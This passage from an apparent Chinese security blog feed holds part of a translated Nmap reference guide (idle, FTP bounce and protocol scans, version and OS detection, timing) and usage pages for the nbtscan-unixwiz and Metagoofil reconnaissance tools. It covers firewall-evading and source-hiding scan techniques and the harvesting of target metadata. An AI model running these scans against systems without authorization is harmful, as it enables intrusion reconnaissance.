标志位的顺序不重要。</p><p>除了设置需要的标志位，您也可以设置 TCP扫描类型(如-sA或者-sF)。 那个基本类型告诉Nmap怎样解释响应。例如， SYN扫描认为没有响应意味着 filtered端口，而FIN扫描则认为是 open|filtered。 除了使用您指定的TCP标记位，Nmap会和基本扫描类型一样工作。 如果您不指定基本类型，就使用SYN扫描。</p><p><strong>-sI<zombie host[:probeport]="">(Idlescan)</zombie></strong></p><p>这种高级的扫描方法允许对目标进行真正的TCP端口盲扫描 (意味着没有报文从您的真实IP地址发送到目标)。相反，side-channel攻击 利用zombie主机上已知的IP分段ID序列生成算法来窥探目标上开放端口的信息。 IDS系统将显示扫描来自您指定的zombie机(必须运行并且符合一定的标准)。 这种奇妙的扫描类型太复杂了，不能在此完全描述，所以我写一篇非正式的论文， 发布在<a href="https://nmap.org/book/idlescan.html" target="_blank" rel="external">https://nmap.org/book/idlescan.html</a>。</p><p>除了极端隐蔽(由于它不从真实IP地址发送任何报文)， 该扫描类型可以建立机器间的基于IP的信任关系。 端口列表从zombie 主机的角度。显示开放的端口。 因此您可以尝试用您认为(通过路由器/包过滤规则)可能被信任的 zombies扫描目标。</p><p>如果您由于IPID改变希望探测zombie上的特定端口， 您可以在zombie 主机后加上一个冒号和端口号。 否则Nmap会使用默认端口(80)。</p><p><strong>-sO (IP协议扫描)</strong></p><p>IP 协议扫描可以让您确定目标机支持哪些IP协议 (TCP，ICMP，IGMP，等等)。从技术上说，这不是端口扫描 ，既然它遍历的是IP协议号而不是TCP或者UDP端口号。 但是它仍使用 -p选项选择要扫描的协议号， 用正常的端口表格式报告结果，甚至用和真正的端口扫描一样 的扫描引擎。因此它和端口扫描非常接近，也被放在这里讨论。</p><p>除了本身很有用，协议扫描还显示了开源软件的力量。 尽管基本想法非常简单，我过去从没想过增加这一功能也没收到任何对它的请求。 在2000年夏天，Gerhard Rieger孕育了这个想法，写了一个很棒的补丁程序，发送到nmap-hackers邮件列表。 我把那个补丁加入了Nmap，第二天发布了新版本。 几乎没有商业软件会有用户有足够的热情设计并贡献他们的改进。</p><p>协议扫描以和UDP扫描类似的方式工作。它不是在UDP报文的端口域上循环， 而是在IP协议域的8位上循环，发送IP报文头。 报文头通常是空的，不包含数据，甚至不包含所申明的协议的正确报文头 TCP，UDP，和ICMP是三个例外。它们三个会使用正常的协议头，因为否则某些系 统拒绝发送，而且Nmap有函数创建它们。协议扫描不是注意ICMP端口不可到达消息， 而是ICMP 协议不可到达消息。如果Nmap从目标主机收到 任何协议的任何响应，Nmap就把那个协议标记为open。 ICMP协议不可到达 错误(类型 3，代号 2) 导致协议被标记为 closed。其它ICMP不可到达协议(类型 3，代号 1，3，9，10，或者13) 导致协议被标记为 filtered (虽然同时他们证明ICMP是 open )。如果重试之后仍没有收到响应， 该协议就被标记为open|filtered</p><p><strong>-b<ftp relay="" host="">(FTP弹跳扫描)</ftp></strong></p><p>FTP协议的一个有趣特征(<a href="http://www.rfc-editor.org/rfc/rfc959.txt" target="_blank" rel="external">RFC 959</a>) 是支持所谓代理ftp连接。它允许用户连接到一台FTP服务器，然后要求文件送到一台第三方服务器。 这个特性在很多层次上被滥用，所以许多服务器已经停止支持它了。其中一种就是导致FTP服务器对其它主机端口扫描。 只要请求FTP服务器轮流发送一个文件到目标主机上的所感兴趣的端口。 错误消息会描述端口是开放还是关闭的。 这是绕过防火墙的好方法，因为FTP服务器常常被置于可以访问比Web主机更多其它内部主机的位置。 Nmap用-b选项支持ftp弹跳扫描。参数格式是<username>:<password>@<server>:<port>。<server>是某个脆弱的FTP服务器的名字或者IP地址。 您也许可以省略<username>:<password>， 如果服务器上开放了匿名用户(user:anonymous password:-wwwuser@)。 端口号(以及前面的冒号) 也可以省略，如果<server>使用默认的FTP端口(21)。</server></password></username></server></port></server></password></username></p><p>当Nmap1997年发布时，这个弱点被广泛利用，但现在大部分已经被fix了。 脆弱的服务器仍然存在，所以如果其它都失败了，这也值得一试。 如果您的目标是绕过防火墙，扫描目标网络上的开放的21端口(或者 甚至任何ftp服务，如果您用版本探测扫描所有端口)， 然后对每个尝试弹跳扫描。Nmap会告诉您该主机脆弱与否。 如果您只是试着玩Nmap，您不必(事实上，不应该)限制您自己。 在您随机地在互联网上寻找脆弱的FTP服务器时，考虑一下系统管理员不太喜欢您这样滥用他们的服务器。</p><h1 id="端口说明和扫描顺序"><a href="#端口说明和扫描顺序" class="headerlink" title="端口说明和扫描顺序"></a>端口说明和扫描顺序</h1><p>除了所有前面讨论的扫描方法， Nmap提供选项说明那些端口被扫描以及扫描是随机还是顺序进行。 默认情况下，Nmap用指定的协议对端口1到1024以及nmap-services 文件中列出的更高的端口在扫描。</p><p><strong>-p<port ranges="">(只扫描指定的端口)</port></strong></p><p>该选项指明您想扫描的端口，覆盖默认值。 单个端口和用连字符表示的端口范围(如 1-1023)都可以。 范围的开始以及/或者结束值可以被省略， 分别导致Nmap使用1和65535。所以您可以指定 -p-从端口1扫描到65535。 如果您特别指定，也可以扫描端口0。 对于IP协议扫描(-sO)，该选项指定您希望扫描的协议号 (0-255)。</p><p>当既扫描TCP端口又扫描UDP端口时，您可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效您直到指定另一个。 例如，参数 -p U:53，111，137，T:21-25，80，139，8080 将扫描UDP 端口53，111，和137，同时扫描列出的TCP端口。注意，要既扫描 UDP又扫描TCP，您必须指定 -sU ，以及至少一个TCP扫描类型(如 -sS，-sF，或者 -sT)。如果没有给定协议限定符， 端口号会被加到所有协议列表。</p><p><strong>-F (快速 (有限的端口) 扫描)</strong></p><p>在nmap的nmap-services 文件中(对于-sO，是协议文件)指定您想要扫描的端口。 这比扫描所有65535个端口快得多。 因为该列表包含如此多的TCP端口(1200多)，这和默认的TCP扫描 scan (大约1600个端口)速度差别不是很大。如果您用–datadir选项指定您自己的 小小的nmap-services文件 ，差别会很惊人。</p><p><strong>-r (不要按随机顺序扫描端口)</strong></p><p>默认情况下，Nmap按随机顺序扫描端口 (除了出于效率的考虑，常用的端口前移)。这种随机化通常都是受欢迎的， 但您也可以指定-r来顺序端口扫描。</p><h1 id="服务和版本探测"><a href="#服务和版本探测" class="headerlink" title="服务和版本探测"></a>服务和版本探测</h1><p>把Nmap指向一个远程机器，它可能告诉您 端口25/tcp，80/tcp，和53/udp是开放的。使用包含大约2,200个著名的服务的 nmap-services数据库， Nmap可以报告那些端口可能分别对应于一个邮件服务器 (SMTP)，web服务器(HTTP)，和域名服务器(DNS)。 这种查询通常是正确的 – 事实上，绝大多数在TCP端口25监听的守护进程是邮件 服务器。然而，您不应该把赌注押在这上面! 人们完全可以在一些奇怪的端口上运行服务。</p><p>即使Nmap是对的，假设运行服务的确实是 SMTP，HTTP和DNS，那也不是特别多的信息。 当为您的公司或者客户作安全评估(或者甚至简单的网络明细清单)时， 您确实想知道正在运行什么邮件和域名服务器以及它们的版本。 有一个精确的版本号对了解服务器有什么漏洞有巨大帮助。 版本探测可以帮您获得该信息。</p><p>在用某种其它类型的扫描方法发现TCP 和/或者UDP端口后， 版本探测会询问这些端口，确定到底什么服务正在运行。 nmap-service-probes 数据库包含查询不同服务的探测报文 和解析识别响应的匹配表达式。 Nmap试图确定服务协议 (如 ftp，ssh，telnet，http)，应用程序名(如ISC Bind，Apache httpd，Solaris telnetd)，版本号， 主机名，设备类型(如 打印机，路由器)，操作系统家族 (如Windows，Linux)以及其它的细节，如 如是否可以连接X server，SSH协议版本 ，或者KaZaA用户名)。当然，并非所有服务都提供所有这些信息。 如果Nmap被编译成支持OpenSSL， 它将连接到SSL服务器，推测什么服务在加密层后面监听。 当发现RPC服务时， Nmap RPC grinder (-sR)会自动被用于确定RPC程序和它的版本号。 如果在扫描某个UDP端口后仍然无法确定该端口是开放的还是被过滤的，那么该端口状态就 被标记为open|filtered。 版本探测将试图从这些端口引发一个响应(就像它对开放端口做的一样)， 如果成功，就把状态改为开放。 open|filtered TCP端口用同样的方法对待。 注意Nmap -A选项在其它情况下打开版本探测。 有一篇关于版本探测的原理，使用和定制的文章在<a href="http://www.insecure.org/nmap/vscan/" target="_blank" rel="external">http://www.insecure.org/nmap/vscan/</a>。</p><p>当Nmap从某个服务收到响应，但不能在数据库中找到匹配时， 它就打印一个特殊的fingerprint和一个URL给您提交，如果您确实知道什么服务运行在端口。 请花两分钟提交您的发现，让每个人受益。由于这些提交， Nmap有350种以上协议如smtp，ftp，http等的大约3，000条模式匹配。</p><p>用下列的选项打开和控制版本探测：</p><p><strong>-sV (版本探测)</strong></p><p>打开版本探测。 您也可以用-A同时打开操作系统探测和版本探测。</p><p><strong>–allports (不为版本探测排除任何端口)</strong></p><p>默认情况下，Nmap版本探测会跳过9100 TCP端口，因为一些打印机简单地打印送到该端口的 任何数据，这回导致数十页HTTP get请求，二进制 SSL会话请求等等被打印出来。这一行为可以通过修改或删除nmap-service-probes 中的Exclude指示符改变， 您也可以不理会任何Exclude指示符，指定–allports扫描所有端口</p><p><strong>–version-intensity<intensity>(设置 版本扫描强度)</intensity></strong></p><p>当进行版本扫描(-sV)时，nmap发送一系列探测报文 ，每个报文都被赋予一个1到9之间的值。 被赋予较低值的探测报文对大范围的常见服务有效，而被赋予较高值的报文 一般没什么用。强度水平说明了应该使用哪些探测报文。数值越高， 服务越有可能被正确识别。 然而，高强度扫描花更多时间。强度值必须在0和9之间。 默认是7。当探测报文通过nmap-service-probes ports指示符 注册到目标端口时，无论什么强度水平，探测报文都会被尝试。这保证了DNS 探测将永远在任何开放的53端口尝试， SSL探测将在443端口尝试，等等。</p><p><strong>–version-light (打开轻量级模式)</strong></p><p>这是 –version-intensity 2的方便的别名。轻量级模式使 版本扫描快许多，但它识别服务的可能性也略微小一点。</p><p><strong>–version-all (尝试每个探测)</strong></p><p>–version-intensity 9的别名， 保证对每个端口尝试每个探测报文。</p><p><strong>–version-trace (跟踪版本扫描活动)</strong></p><p>这导致Nmap打印出详细的关于正在进行的扫描的调试信息。 它是您用–packet-trace所得到的信息的子集。</p><p><strong>-sR (RPC扫描)</strong></p><p>这种方法和许多端口扫描方法联合使用。 它对所有被发现开放的TCP/UDP端口执行SunRPC程序NULL命令，来试图 确定它们是否RPC端口，如果是， 是什么程序和版本号。因此您可以有效地获得和<strong>rpcinfo -p</strong>一样的信息， 即使目标的端口映射在防火墙后面(或者被TCP包装器保护)。Decoys目前不能和RPC scan一起工作。 这作为版本扫描(-sV)的一部分自动打开。 由于版本探测包括它并且全面得多，-sR很少被需要。</p><h1 id="操作系统探测"><a href="#操作系统探测" class="headerlink" title="操作系统探测"></a>操作系统探测</h1><p>Nmap最著名的功能之一是用TCP/IP协议栈fingerprinting进行远程操作系统探测。 Nmap发送一系列TCP和UDP报文到远程主机，检查响应中的每一个比特。 在进行一打测试如TCP ISN采样，TCP选项支持和排序，IPID采样，和初始窗口大小检查之后， Nmap把结果和数据库nmap-os-fingerprints中超过 1500个已知的操作系统的fingerprints进行比较，如果有匹配，就打印出操作系统的详细信息。 每个fingerprint包括一个自由格式的关于OS的描述文本， 和一个分类信息，它提供供应商名称(如Sun)，下面的操作系统(如Solaris)，OS版本(如10)， 和设备类型(通用设备，路由器，switch，游戏控制台， 等)。</p><p>如果Nmap不能猜出操作系统，并且有些好的已知条件(如 至少发现了一个开放端口和一个关闭端口)，Nmap会提供一个 URL，如果您确知运行的操作系统，您可以把fingerprint提交到那个URL。 这样您就扩大了Nmap的操作系统知识库，从而让每个Nmap用户都受益。</p><p>操作系统检测可以进行其它一些测试，这些测试可以利用处理 过程中收集到的信息。例如运行时间检测，使用TCP时间戳选项(RFC 1323) 来估计主机上次重启的时间，这仅适用于提供这类信息的主机。另一种 是TCP序列号预测分类，用于测试针对远程主机建立一个伪造的TCP连接 的可能难度。这对于利用基于源IP地址的可信关系(rlogin，防火墙过滤等) 或者隐含源地址的攻击非常重要。这一类哄骗攻击现在很少见，但一些 主机仍然存在这方面的漏洞。实际的难度值基于统计采样，因此可能会有 一些波动。通常采用英国的分类较好，如“worthy challenge”或者 “trivial joke”。在详细模式(-v)下只以 普通的方式输出，如果同时使用-O，还报告IPID序列产生号。 很多主机的序列号是“增加”类别，即在每个发送包的IP头中 增加ID域值， 这对一些先进的信息收集和哄骗攻击来说是个漏洞。</p><p><a href="https://nmap.org/book/osdetect.html" target="_blank" rel="external">https://nmap.org/book/osdetect.html</a>文档使用多种语言描述了版本检测的方式、使用和定制。</p><p>采用下列选项启用和控制操作系统检测:</p><p><strong>-O (启用操作系统检测)</strong></p><p>也可以使用-A来同时启用操作系统检测和版本检测。</p><p><strong>–osscan-limit (针对指定的目标进行操作系统检测)</strong></p><p>如果发现一个打开和关闭的TCP端口时，操作系统检测会更有效。 采用这个选项，Nmap只对满足这个条件的主机进行操作系统检测，这样可以 节约时间，特别在使用-P0扫描多个主机时。这个选项仅在使用 -O或-A 进行操作系统检测时起作用。</p><p><strong>–osscan-guess; –fuzzy (推测操作系统检测结果)</strong></p><p>当Nmap无法确定所检测的操作系统时，会尽可能地提供最相近的匹配，Nmap默认 进行这种匹配，使用上述任一个选项使得Nmap的推测更加有效。</p><h1 id="时间和性能"><a href="#时间和性能" class="headerlink" title="时间和性能"></a>时间和性能</h1><p>Nmap开发的最高优先级是性能。在本地网络对一个主机的默认扫描(nmap<hostname>)需要1/5秒。而仅仅眨眼的 时间，就需要扫描上万甚至几十万的主机。此外，一些特定的扫描选项会明显增 加扫描时间，如UDP扫描和版本检测。同样，防火墙配置以及特殊的响应速度限制也会 增加时间。Nmap使用了并行算法和许多先进的算法来加速扫描，用户对Nmap如何 工作有最终的控制权。高级用户可以仔细地调整Nmap命令，在满足时间要求的同时获得他们所关心的信息。</hostname></p><p>改善扫描时间的技术有：忽略非关键的检测、升级最新版本的Nmap(性能增强不断改善)。 优化时间参数也会带来实质性的变化，这些参数如下。</p><p><strong>–min-hostgroup<milliseconds>; –max-hostgroup<milliseconds>(调整并行扫描组的大小)</milliseconds></milliseconds></strong></p><p>Nmap具有并行扫描多主机端口或版本的能力，Nmap将多个目标IP地址 空间分成组，然后在同一时间对一个组进行扫描。通常，大的组更有效。缺 点是只有当整个组扫描结束后才会提供主机的扫描结果。如果组的大小定义 为50，则只有当前50个主机扫描结束后才能得到报告(详细模式中的补充信息 除外)。</p><p>默认方式下，Nmap采取折衷的方法。开始扫描时的组较小， 最小为5，这样便于尽快产生结果；随后增长组的大小，最大为1024。确切的 大小依赖于所给定的选项。为保证效率，针对UDP或少量端口的TCP扫描，Nmap 使用大的组。</p><p>–max-hostgroup选项用于说明使用最大的组，Nmap不会超出这个大小。–min-hostgroup选项说明最小的组，Nmap 会保持组大于这个值。如果在指定的接口上没有足够的目标主机来满足所 指定的最小值，Nmap可能会采用比所指定的值小的组。这两个参数虽然很少使用， 但都用于保持组的大小在一个指定的范围之内。</p><p>这些选项的主要用途是说明一个最小组的大小，使得整个扫描更加快速。通常 选择256来扫描C类网段。对于端口数较多的扫描，超出该值没有意义。对于 端口数较少的扫描，2048或更大的组大小是有帮助的。</p><p><strong>–min-parallelism<milliseconds>; –max-parallelism<milliseconds>(调整探测报文的并行度)</milliseconds></milliseconds></strong></p><p>这些选项控制用于主机组的探测报文数量，可用于端口扫描和主机发现。默认状态下， Nmap基于网络性能计算一个理想的并行度，这个值经常改变。如果报文被丢弃， Nmap降低速度，探测报文数量减少。随着网络性能的改善，理想的探测报文数量会缓慢增加。 这些选项确定这个变量的大小范围。默认状态下，当网络不可靠时，理想的并行度值 可能为1，在好的条件下，可能会增长至几百。</p><p>最常见的应用是–min-parallelism值大于1，以加快 性能不佳的主机或网络的扫描。这个选项具有风险，如果过高则影响准确度，同时 也会降低Nmap基于网络条件动态控制并行度的能力。这个值设为10较为合适， 这个值的调整往往作为最后的手段。</p><p>–max-parallelism选项通常设为1，以防止Nmap在同一时间 向主机发送多个探测报文，和选择–scan-delay同时使用非常有用，虽然 这个选项本身的用途已经很好。</p><p><strong>–min-rtt-timeout<milliseconds>， –max-rtt-timeout<milliseconds>， –initial-rtt-timeout<milliseconds>(调整探测报文超时)</milliseconds></milliseconds></milliseconds></strong></p><p>Nmap使用一个运行超时值来确定等待探测报文响应的时间，随后会放弃或重新 发送探测报文。Nmap基于上一个探测报文的响应时间来计算超时值，如果网络延迟比较显著 和不定，这个超时值会增加几秒。初始值的比较保守(高)，而当Nmap扫描无响应 的主机时，这个保守值会保持一段时间。</p><p>这些选项以毫秒为单位，采用小的–max-rtt-timeout值，使 –initial-rtt-timeout值大于默认值可以明显减少扫描时间，特别 是对不能ping通的扫描(-P0)以及具有严格过滤的网络。如果使用太 小的值，使得很多探测报文超时从而重新发送，而此时可能响应消息正在发送，这使得整个扫描的时 间会增加。</p><p>如果所有的主机都在本地网络，对于–max-rtt-timeout值来 说，100毫秒比较合适。如果存在路由，首先使用ICMP ping工具ping主机，或使用其 它报文工具如hpings，可以更好地穿透防火墙。查看大约10个包的最大往返时间，然后将 –initial-rtt-timeout设成这个时间的2倍，–max-rtt-timeout 可设成这个时间值的3倍或4倍。通常，不管ping的时间是多少，最大的rtt值不得小于100ms， 不能超过1000ms。</p><p>–min-rtt-timeout这个选项很少使用，当网络不可靠时， Nmap的默认值也显得过于强烈，这时这个选项可起作用。当网络看起来不可靠时，Nmap仅将 超时时间降至最小值，这个情况是不正常的，需要向nmap-dev邮件列表报告bug。</p><p><strong>–host-timeout<milliseconds>(放弃低速目标主机)</milliseconds></strong></p><p>由于性能较差或不可靠的网络硬件或软件、带宽限制、严格的防火墙等原因， 一些主机需要很长的时间扫描。这些极少数的主机扫描往往占 据了大部分的扫描时间。因此，最好的办法是减少时间消耗并且忽略这些主机，使用 –host-timeout选项来说明等待的时间(毫秒)。通常使用1800000 来保证Nmap不会在单个主机上使用超过半小时的时间。需要注意的是，Nmap在这半小时中可以 同时扫描其它主机，因此并不是完全放弃扫描。超时的主机被忽略，因此也没有针对该主机的 端口表、操作系统检测或版本检测结果的输出。</p><p><strong>–scan-delay<milliseconds>; –max-scan-delay<milliseconds>(调整探测报文的时间间隔)</milliseconds></milliseconds></strong></p><p>这个选项用于Nmap控制针对一个主机发送探测报文的等待时间(毫秒)，在带宽 控制的情况下这</p>]]></content>
    
    <summary type="html">
    
      项目地址：Nmap-Reference-Guide [https://github.com/sunnyelf/Nmap-Reference-Guide]

#目录目录
 * 译注
 * 名称
 * 命令
 * 描述
 * 选项概要
 * 目标说明
 * 主机发现
 * 端口扫描基础
 * 端口扫描技术
 * 端口说明和扫描顺序
 * 服务和版本探测
 * 操作系统探测
 * 时间和性能
 * 防火墙/IDS躲避和欺骗
 * 输出
 * 其它选项
 * 运行时交互
 * 实例
 * Bugs
 * 作者
 * 法律事项(版权、许可证、担保(缺)、出口限制)
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="reference" scheme="https://hackfun.org/tags/reference/"/>
    
      <category term="guide" scheme="https://hackfun.org/tags/guide/"/>
    
      <category term="nmap" scheme="https://hackfun.org/tags/nmap/"/>
    
      <category term="nmap参考指南" scheme="https://hackfun.org/tags/nmap%E5%8F%82%E8%80%83%E6%8C%87%E5%8D%97/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之nbtscan-unixwiz</title>
    <link href="https://hackfun.org/2017/04/24/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bnbtscan-unixwiz/"/>
    <id>https://hackfun.org/2017/04/24/Kali-Linux信息收集之nbtscan-unixwiz/</id>
    <published>2017-04-24T05:34:00.000Z</published>
    <updated>2017-10-02T19:22:31.955Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现，但它可在许多地址上运行，而不是仅一个地址。</p><a id="more"></a><p><a href="http://unixwiz.net/tools/nbtscan.html" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/nbtscan-unixwiz.git;a=tree;h=refs/heads/kali/master;hb=refs/heads/kali/master" target="_blank" rel="external">仓库</a></p><ul><li>作者：Steve Friedl</li><li>证书：public-domain</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><p>NBTSCAN-unixwiz - 开放NETBIOS名称服务器扫描器</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">root@kali:~# nbtscan-unixwiz</div><div class="line">nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/</div><div class="line"></div><div class="line">用法: nbtscan-unixwiz [选项] 目标 [目标...]</div><div class="line"></div><div class="line">   目标可以是IP地址，DNS名称或地址的列表范围。</div><div class="line">   范围可以表示成“192.168.12.0/24”或“192.168.12.64-97”</div><div class="line"></div><div class="line">   -V        显示版本信息</div><div class="line">   -f        显示完整的NBT资源记录响应(推荐)</div><div class="line">   -H        生成HTTP请求头</div><div class="line">   -v        开启详细输出调试</div><div class="line">   -n        不查找响应IP地址的反向名称</div><div class="line">   -p &lt;n&gt;    绑定UDP端口(默认0)</div><div class="line">   -m        响应中包含MAC地址 (等同&apos;-f&apos;)</div><div class="line">   -T &lt;n&gt;    超时不响应 (默认2秒)</div><div class="line">   -w &lt;n&gt;    次写入后等待秒数 (默认10ms)</div><div class="line">   -t &lt;n&gt;    每个地址尝试次数(默认1次)</div><div class="line">   -P        以perl的hashref格式生成结果</div></pre></td></tr></table></figure><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>扫描一系列IP地址（192.168.0.100-110），而不进行反向名称查找（-n）：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">root@kali:~# nbtscan-unixwiz -n 192.168.0.100-110</div><div class="line">192.168.0.105   WORKGROUP\RETROPIE              SHARING</div><div class="line">*timeout (normal end of scan)</div></pre></td></tr></table></figure><p></p><p>扫描单个IP地址（192.168.0.38）并显示完整的NBT资源记录响应（-f）：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">root@kali:~# nbtscan-unixwiz -f 192.168.0.38</div><div class="line">192.168.0.38    WORKGROUP\DOOKOSSEL             SHARING</div><div class="line">  DOOKOSSEL      &lt;00&gt; UNIQUE Workstation Service</div><div class="line">  DOOKOSSEL      &lt;03&gt; UNIQUE Messenger Service&lt;3&gt;</div><div class="line">  DOOKOSSEL      &lt;20&gt; UNIQUE File Server Service</div><div class="line">  ..__MSBROWSE__.&lt;01&gt; GROUP  Master Browser</div><div class="line">  WORKGROUP      &lt;00&gt; GROUP  Domain Name</div><div class="line">  WORKGROUP      &lt;1d&gt; UNIQUE Master Browser</div><div class="line">  WORKGROUP      &lt;1e&gt; GROUP  Browser Service Elections</div><div class="line">  00:00:00:00:00:00   ETHER</div></pre></td></tr></table></figure><p></p><p>视频演示：<a href="https://asciinema.org/a/104243" target="_blank" rel="external">https://asciinema.org/a/104243</a></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具。它基于Windows系统的nbtstat工具的功能实现，但它可在许多地址上运行，而不是仅一个地址。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="enumeration" scheme="https://hackfun.org/tags/enumeration/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="nbtscan-unixwiz" scheme="https://hackfun.org/tags/nbtscan-unixwiz/"/>
    
      <category term="netbios" scheme="https://hackfun.org/tags/netbios/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之Metagoofil</title>
    <link href="https://hackfun.org/2017/04/24/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8BMetagoofil/"/>
    <id>https://hackfun.org/2017/04/24/Kali-Linux信息收集之Metagoofil/</id>
    <published>2017-04-24T05:01:00.000Z</published>
    <updated>2017-10-02T19:22:31.951Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>Metagoofil是一种搜索提取目标公司公开文档（pdf，doc，xls，ppt，docx，pptx，xlsx）中元数据的信息收集工具。</p><p>Metagoofil将在Google中进行搜索，以将文档识别并下载到本地磁盘，然后将使用不同的库（如Hachoir，PdfMiner）提取元数据，通过分析得到结果生成具有用户名，软件版本和服务器或机器名称的报告，有助于渗透测试人员信息收集阶段的工作。</p><p>“MetaGooFil”也是信息收集过程中可以利用的优秀软件，由开发The Harvester的团队编写而成，可用来提取元数据（metadata）。元数据经常被定义为是关于数据的数据。在我们创建文档时，例如Word或PowerPoint演示文稿，额外的数据也会被同时创建，并储存在文档里。这些数据通常是对该文档的描述信息，包括文件名、文件大小、作者或创建者的用户名，以及文件保存的位置或路径。这个过程全自动进行，无需用户输入或干预。</p><p>攻击者若能读取到这些信息，就能对目标公司的用户名、系统名、文件共享以及其他诸多好东西有独特的见解。MetaGooFil就是这么一个工具，能在互联网上搜索属于目标的文档。一旦有所发现，MetaGooFil就会把这些文档下载下来，并尝试提取有用的元数据。</p><a id="more"></a><p><a href="http://www.edge-security.com/metagoofil.php" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/metagoofil.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Christian Martorella</li><li>证书：GPLv2</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><p>metagoofil - 用于提取公共文档元数据的工具<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div></pre></td><td class="code"><pre><div class="line">root@kali:~# metagoofil</div><div class="line"></div><div class="line">******************************************************</div><div class="line">*     /\/\   ___| |_ __ _  __ _  ___   ___  / _(_) | *</div><div class="line">*    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *</div><div class="line">*   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *</div><div class="line">*   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *</div><div class="line">*                         |___/                      *</div><div class="line">* Metagoofil Ver 2.2                                 *</div><div class="line">* Christian Martorella                               *</div><div class="line">* Edge-Security.com                                  *</div><div class="line">* cmartorella_at_edge-security.com                   *</div><div class="line">******************************************************</div><div class="line"></div><div class="line"> 用法: metagoofil [选项]</div><div class="line"></div><div class="line">         -d: 目标域名</div><div class="line">         -t: 下载文件的类型 (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)</div><div class="line">         -l: 限制搜索结果数量 (默认 200)</div><div class="line">         -h: 分析目录中的文档 (值为&quot;yes&quot;进行本地分析)</div><div class="line">         -n: 限制下载文件数量</div><div class="line">         -o: 工作目录 (保存下载文件目录)</div><div class="line">         -f: 输出文件</div><div class="line"></div><div class="line"> 示例:</div><div class="line">  metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html</div><div class="line">  metagoofil.py -h yes -o applefiles -f results.html (本地目录分析)</div></pre></td></tr></table></figure><p></p><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>搜索PDF文件（-t pdf），搜索100个结果（-l 100），下载25个文件（-n 25），目标域（-d kali.org）中的文档，将下载保存到目录（-o kalipdf），并将输出保存到文件（-f kalipdf.html）：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">root@kali:~# metagoofil -d kali.org -t pdf -l 100 -n 25 -o kalipdf -f kalipdf.html</div><div class="line"></div><div class="line">******************************************************</div><div class="line">*     /\/\   ___| |_ __ _  __ _  